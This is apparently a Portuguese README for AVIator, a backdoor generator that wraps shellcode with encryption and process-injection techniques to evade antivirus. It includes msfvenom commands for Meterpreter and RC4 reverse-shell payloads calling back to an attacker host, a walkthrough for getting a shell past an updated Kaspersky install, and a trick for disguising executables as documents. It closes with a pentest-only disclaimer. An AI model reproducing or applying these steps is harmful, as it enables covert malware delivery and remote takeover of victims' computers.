
Projeto de evasão de antivírus
AVIAtor Portado para NETCore 5 com uma UI atualizada
Sobre://name
AV: AntiVirus
Ator: É um espadachim, alquimista, cientista, mago, acadêmico e engenheiro, com a capacidade de às vezes produzir objetos do nada (https://en.wikipedia.org/wiki/Ator)
Sobre://purpose
AV|Ator é um utilitário gerador de backdoors, que utiliza técnicas criptográficas e de injeção para contornar a detecção de AV. Mais especificamente:
[https://attack.mitre.org/techniques/T1055/]:
Injeção de executável portátil que envolve escrever código malicioso diretamente no processo (sem um arquivo em disco) e depois invocar a execução com código adicional ou criando uma thread remota. O deslocamento do código injetado introduz o requisito adicional de funcionalidade para remapear referências de memória. Variações deste método, como injeção reflexiva de DLL (escrever uma DLL auto-mapeada em um processo) e módulo de memória (mapear DLL ao escrever no processo), superam o problema de realocação de endereços.
Sequestro de execução de thread que envolve injetar código malicioso ou o caminho para uma DLL em uma thread de um processo. Semelhante ao Process Hollowing, a thread deve primeiro ser suspensa.
O aplicativo possui um formulário que consiste em três entradas principais (Veja a captura de tela abaixo):

Nota importante: O shellcode deve ser fornecido como um array de bytes em C#.
Os valores padrão contêm shellcode que executa notepad.exe (32 bits). Esta demonstração é fornecida como uma indicação de como o código deve ser formado (usando msfvenom, isso pode ser feito facilmente com a opção -f csharp, ex.: msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=XXXX -f csharp).
Após preencher as entradas fornecidas e selecionar o caminho de saída, um executável é gerado de acordo com as opções escolhidas.
Em palavras simples, falsificar um arquivo executável para parecer ter uma extensão "inocente" como 'pdf', 'txt' etc. Ex.: o arquivo "testcod.exe" será interpretado como "tesexe.doc"
Cuidado com o fato de que alguns AVs alertam a falsificação por si só como um malware.
Acho que todos sabem o que é :)
Obtendo um shell em uma máquina Windows 10 executando o Kaspersky AV totalmente atualizado
Crie o payload usando msfvenom
msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp
Use o AVIator com as seguintes configurações
Arquitetura do SO alvo: x64
Técnica de Injeção: Thread Hijacking (Arquitetura do Shellcode: x64, arquitetura do SO: x64)
Procedimento alvo: explorer (deixe o padrão)
Configure o listener na máquina atacante
Execute o exe gerado na máquina vítima
Windows:
Compile o projeto ou baixe o executável já compilado da seguinte pasta:
https://github.com/Ch0pin/AVIator/tree/master/Compiled%20Binaries
Linux:
Instale o Mono de acordo com sua distribuição Linux, baixe e execute os binários
ex. no kali:
root@kali# apt install mono-devel
root@kali# mono aviator.exe
Para Damon Mohammadbagher pelo procedimento de criptografia
Desenvolvi este aplicativo para superar os desafios do processo de pentest e esta é a ÚNICA MANEIRA pela qual este aplicativo deve ser usado. Certifique-se de ter a permissão necessária para usá-lo contra um sistema e nunca o use para fins ilegais.